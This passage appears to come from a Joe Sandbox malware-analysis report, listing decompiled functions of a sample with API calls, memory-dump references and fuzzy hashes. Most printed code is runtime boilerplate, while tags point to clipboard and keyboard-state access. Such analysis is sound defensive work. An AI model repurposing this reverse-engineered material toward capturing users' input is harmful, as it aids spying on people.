                                                                                                                          • Instruction Fuzzy Hash: 5132E4B090430ADFCB54DF58D488B9EBBF0FB48314F10C96AE9599B250D774AA98CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024ACE0 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1615112705-0
                                                                                                                          • Opcode ID: fbf0b6c29bef8532a98e013d860cdda6cb34f33ba566f3658ff4a683fb3ea308
                                                                                                                          • Instruction ID: 47c3903bb0943f40f61db8b5db386c394b0af8203d64a84a4a5d2fce4fc1742c
                                                                                                                          • Opcode Fuzzy Hash: fbf0b6c29bef8532a98e013d860cdda6cb34f33ba566f3658ff4a683fb3ea308
                                                                                                                          • Instruction Fuzzy Hash: 2841E4B4914208EFDB04EFA8E5897ADBBF0FF04304F008469E895E7350E775A5A4DB56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00255387 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00255387(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0x264050; // 0x6b8b9fba
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E002554FD( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E002554FD(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E002552D3(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E002580F0(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00255521);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E002552D3(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E0024DB65(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                                                                                                                          0x00255392
                                                                                                                          0x00255399
                                                                                                                          0x0025539c
                                                                                                                          0x0025539f
                                                                                                                          0x002553a5
                                                                                                                          0x002553a8
                                                                                                                          0x002553b0
                                                                                                                          0x002553b2
                                                                                                                          0x002553c5
                                                                                                                          0x002553ca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002553ca
                                                                                                                          0x002553cc
                                                                                                                          0x002553cc
                                                                                                                          0x002553d2
                                                                                                                          0x002553d8
                                                                                                                          0x002553f4
                                                                                                                          0x002553f5
                                                                                                                          0x002553fb
                                                                                                                          0x00255407
                                                                                                                          0x0025540a
                                                                                                                          0x0025540c
                                                                                                                          0x00255413
                                                                                                                          0x00255428
                                                                                                                          0x0025542d
                                                                                                                          0x00255437
                                                                                                                          0x00255447
                                                                                                                          0x0025544d
                                                                                                                          0x0025544e
                                                                                                                          0x00255455
                                                                                                                          0x00255474
                                                                                                                          0x00255483
                                                                                                                          0x00255488
                                                                                                                          0x0025548b
                                                                                                                          0x00255493
                                                                                                                          0x002554e2
                                                                                                                          0x002554e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00255495
                                                                                                                          0x0025549d
                                                                                                                          0x002554a7
                                                                                                                          0x002554a7
                                                                                                                          0x002554ad
                                                                                                                          0x002554b1
                                                                                                                          0x002554b7
                                                                                                                          0x002554bc
                                                                                                                          0x002554d7
                                                                                                                          0x002554dc
                                                                                                                          0x002554bf
                                                                                                                          0x002554c5
                                                                                                                          0x0025542f
                                                                                                                          0x0025542f
                                                                                                                          0x00000000
                                                                                                                          0x0025542f
                                                                                                                          0x002553da
                                                                                                                          0x002553da
                                                                                                                          0x002553df
                                                                                                                          0x00000000
                                                                                                                          0x002553e1
                                                                                                                          0x002553e1
                                                                                                                          0x002553e2
                                                                                                                          0x002553e4
                                                                                                                          0x002553e7
                                                                                                                          0x002553ec
                                                                                                                          0x002553df
                                                                                                                          0x002554ee
                                                                                                                          0x002554fc

                                                                                                                          APIs
                                                                                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00255422
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0025549D
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002554BF
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002554E2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1164774033-0
                                                                                                                          • Opcode ID: 8165d26f870b9bb943cfcf0ba50a1a12fa2af3ff5df12d6c3ebc482ee0118ed8
                                                                                                                          • Instruction ID: 766f5faa58c8e3e31b3085383394be77153d35cd6b1af68f9aded7db5ac0205a
                                                                                                                          • Opcode Fuzzy Hash: 8165d26f870b9bb943cfcf0ba50a1a12fa2af3ff5df12d6c3ebc482ee0118ed8
                                                                                                                          • Instruction Fuzzy Hash: 2E41E57191093AAFDB20DF64DC989BAB378EF84347F1481D5E805D7140E7709EE88B58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024D76C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E0024D76C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0024D6E0(_t34);
				 *_t60 = 0x2cc;
				_v632 = E0024FC70(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E0024FC70(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0024D6E0(_t49);
				}
				return _t49;
			}


































                                                                                                                          0x0024d76c
                                                                                                                          0x0024d76c
                                                                                                                          0x0024d76c
                                                                                                                          0x0024d780
                                                                                                                          0x0024d782
                                                                                                                          0x0024d785
                                                                                                                          0x0024d785
                                                                                                                          0x0024d789
                                                                                                                          0x0024d78e
                                                                                                                          0x0024d7a6
                                                                                                                          0x0024d7ac
                                                                                                                          0x0024d7b2
                                                                                                                          0x0024d7b8
                                                                                                                          0x0024d7be
                                                                                                                          0x0024d7c4
                                                                                                                          0x0024d7ca
                                                                                                                          0x0024d7d1
                                                                                                                          0x0024d7d8
                                                                                                                          0x0024d7df
                                                                                                                          0x0024d7e6
                                                                                                                          0x0024d7ed
                                                                                                                          0x0024d7f4
                                                                                                                          0x0024d7f5
                                                                                                                          0x0024d7fe
                                                                                                                          0x0024d804
                                                                                                                          0x0024d807
                                                                                                                          0x0024d80d
                                                                                                                          0x0024d81c
                                                                                                                          0x0024d828
                                                                                                                          0x0024d833
                                                                                                                          0x0024d83a
                                                                                                                          0x0024d841
                                                                                                                          0x0024d84c
                                                                                                                          0x0024d854
                                                                                                                          0x0024d85d
                                                                                                                          0x0024d85f
                                                                                                                          0x0024d862
                                                                                                                          0x0024d864
                                                                                                                          0x0024d86e
                                                                                                                          0x0024d876
                                                                                                                          0x0024d87c
                                                                                                                          0x00000000
                                                                                                                          0x0024d883
                                                                                                                          0x0024d886

                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024D778
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0024D844
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0024D864
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0024D86E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 254469556-0
                                                                                                                          • Opcode ID: 9f730e33953482ef4ac2f1aa2c726600f47f10b0ae4ec81473eda12b3ea2901e
                                                                                                                          • Instruction ID: 3de2f829fadfb232cfb405e4bdfa7017c82e6d320dfebf328ffa9cb86e07b259
                                                                                                                          • Opcode Fuzzy Hash: 9f730e33953482ef4ac2f1aa2c726600f47f10b0ae4ec81473eda12b3ea2901e
                                                                                                                          • Instruction Fuzzy Hash: 3B312775D5121D9BDB10DFA4D989BCDBBB8AF08304F1041EAE40DAB250EB709A95CF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0025381A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E0025381A(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x264050; // 0x6b8b9fba
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0024D6E0(_t41);
					_pop(_t61);
				}
				E0024FC70(_t66,  &_v804, 0, 0x50);
				E0024FC70(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -808
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0024D6E0(_t57);
				}
				return E0024DB65(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}






































                                                                                                                          0x0025381a
                                                                                                                          0x0025381a
                                                                                                                          0x0025381a
                                                                                                                          0x00253825
                                                                                                                          0x0025382a
                                                                                                                          0x0025382c
                                                                                                                          0x00253834
                                                                                                                          0x00253836
                                                                                                                          0x00253839
                                                                                                                          0x0025383e
                                                                                                                          0x0025383e
                                                                                                                          0x0025384a
                                                                                                                          0x0025385d
                                                                                                                          0x0025386b
                                                                                                                          0x00253871
                                                                                                                          0x00253877
                                                                                                                          0x0025387d
                                                                                                                          0x00253883
                                                                                                                          0x00253889
                                                                                                                          0x0025388f
                                                                                                                          0x00253895
                                                                                                                          0x0025389b
                                                                                                                          0x002538a1
                                                                                                                          0x002538a8
                                                                                                                          0x002538af
                                                                                                                          0x002538b6
                                                                                                                          0x002538bd
                                                                                                                          0x002538c4
                                                                                                                          0x002538cb
                                                                                                                          0x002538cc
                                                                                                                          0x002538d5
                                                                                                                          0x002538db
                                                                                                                          0x002538db
                                                                                                                          0x002538de
                                                                                                                          0x002538e4
                                                                                                                          0x002538f1
                                                                                                                          0x002538fa
                                                                                                                          0x00253903
                                                                                                                          0x0025390c
                                                                                                                          0x0025391a
                                                                                                                          0x0025391c
                                                                                                                          0x00253922
                                                                                                                          0x00253931
                                                                                                                          0x0025393d
                                                                                                                          0x00253940
                                                                                                                          0x00253945
                                                                                                                          0x00253952

                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00253912
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0025391C
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 00253929
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: b815c8b88f7202027a971231a3eccceac03140f517fb27ac7321b853509c71bc
                                                                                                                          • Instruction ID: 3055c81a0b6a4657968357a59bc30169f6101ee5fadef87f08a6fb3cf4869a1d
                                                                                                                          • Opcode Fuzzy Hash: b815c8b88f7202027a971231a3eccceac03140f517fb27ac7321b853509c71bc
                                                                                                                          • Instruction Fuzzy Hash: C531C2B491122DABCB25DF64D9897CCBBB8BF08750F5041EAE81CA7250E7709B958F48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024D985 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0024D985(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0x265aa0 =  *0x265aa0 & 0x00000000;
				 *0x264058 =  *0x264058 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x265aa4;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x265aa4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x264058; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x265aa0 = 1;
					 *0x264058 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x265aa0 = 2;
						 *0x264058 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x264058; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x265aa0 = 3;
								 *0x264058 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x265aa0 = 5;
									 *0x264058 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x264058 =  *0x264058 | 0x00000040;
										 *0x265aa0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0x265aa4 | 0x00000001;
					 *0x265aa4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}





























                                                                                                                          0x0024d985
                                                                                                                          0x0024d988
                                                                                                                          0x0024d992
                                                                                                                          0x0024d9a3
                                                                                                                          0x0024db55
                                                                                                                          0x0024db58
                                                                                                                          0x0024db58
                                                                                                                          0x0024d9a9
                                                                                                                          0x0024d9af
                                                                                                                          0x0024d9b4
                                                                                                                          0x0024d9b8
                                                                                                                          0x0024d9bc
                                                                                                                          0x0024d9be
                                                                                                                          0x0024d9c0
                                                                                                                          0x0024d9c3
                                                                                                                          0x0024d9c8
                                                                                                                          0x0024d9d1
                                                                                                                          0x0024d9e2
                                                                                                                          0x0024d9ed
                                                                                                                          0x0024d9f3
                                                                                                                          0x0024d9f4
                                                                                                                          0x0024d9fa
                                                                                                                          0x0024d9fd
                                                                                                                          0x0024da07
                                                                                                                          0x0024da0a
                                                                                                                          0x0024da0d
                                                                                                                          0x0024da10
                                                                                                                          0x0024da55
                                                                                                                          0x0024da55
                                                                                                                          0x0024da5b
                                                                                                                          0x0024da5b
                                                                                                                          0x0024da60
                                                                                                                          0x0024da61
                                                                                                                          0x0024da67
                                                                                                                          0x0024da99
                                                                                                                          0x0024da69
                                                                                                                          0x0024da6b
                                                                                                                          0x0024da6c
                                                                                                                          0x0024da72
                                                                                                                          0x0024da75
                                                                                                                          0x0024da77
                                                                                                                          0x0024da7a
                                                                                                                          0x0024da7d
                                                                                                                          0x0024da80
                                                                                                                          0x0024da83
                                                                                                                          0x0024da8c
                                                                                                                          0x0024da91
                                                                                                                          0x0024da91
                                                                                                                          0x0024da8c
                                                                                                                          0x0024da9c
                                                                                                                          0x0024daa1
                                                                                                                          0x0024daa4
                                                                                                                          0x0024daae
                                                                                                                          0x0024dab9
                                                                                                                          0x0024dabf
                                                                                                                          0x0024dac2
                                                                                                                          0x0024dacc
                                                                                                                          0x0024dad7
                                                                                                                          0x0024dae3
                                                                                                                          0x0024dae6
                                                                                                                          0x0024dae9
                                                                                                                          0x0024daf4
                                                                                                                          0x0024daf9
                                                                                                                          0x0024dafb
                                                                                                                          0x0024db00
                                                                                                                          0x0024db03
                                                                                                                          0x0024db0d
                                                                                                                          0x0024db15
                                                                                                                          0x0024db1a
                                                                                                                          0x0024db24
                                                                                                                          0x0024db32
                                                                                                                          0x0024db45
                                                                                                                          0x0024db4c
                                                                                                                          0x0024db4c
                                                                                                                          0x0024db32
                                                                                                                          0x0024db15
                                                                                                                          0x0024daf9
                                                                                                                          0x0024dad7
                                                                                                                          0x00000000
                                                                                                                          0x0024db54
                                                                                                                          0x0024da15
                                                                                                                          0x0024da1f
                                                                                                                          0x0024da4a
                                                                                                                          0x0024da4d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0024D99B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2325560087-0
                                                                                                                          • Opcode ID: 015f9fa95014f06a4982a3759d15234f1fc3249e102f8fc57edcb5f4fd7eb2dc
                                                                                                                          • Instruction ID: 2c4a5be900b64b5f26cc67c40f4bcdb95a1ff2f5d1f4e3ae2716930571691717
                                                                                                                          • Opcode Fuzzy Hash: 015f9fa95014f06a4982a3759d15234f1fc3249e102f8fc57edcb5f4fd7eb2dc
                                                                                                                          • Instruction Fuzzy Hash: 0F51AEB19216268FDB1CCF98E9D97AAB7F0FB44308F25C52AD815EB250D3B4AD50CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024B870 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardState
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1724228437-0
                                                                                                                          • Opcode ID: 3730ef5aa65c304e5d08ba1396b19783fc0a18d64667abfcf5b0030156945832
                                                                                                                          • Instruction ID: e874f120e188e8d73c6e2067e553973825662cbf5fe54c24c0c7b76161160472
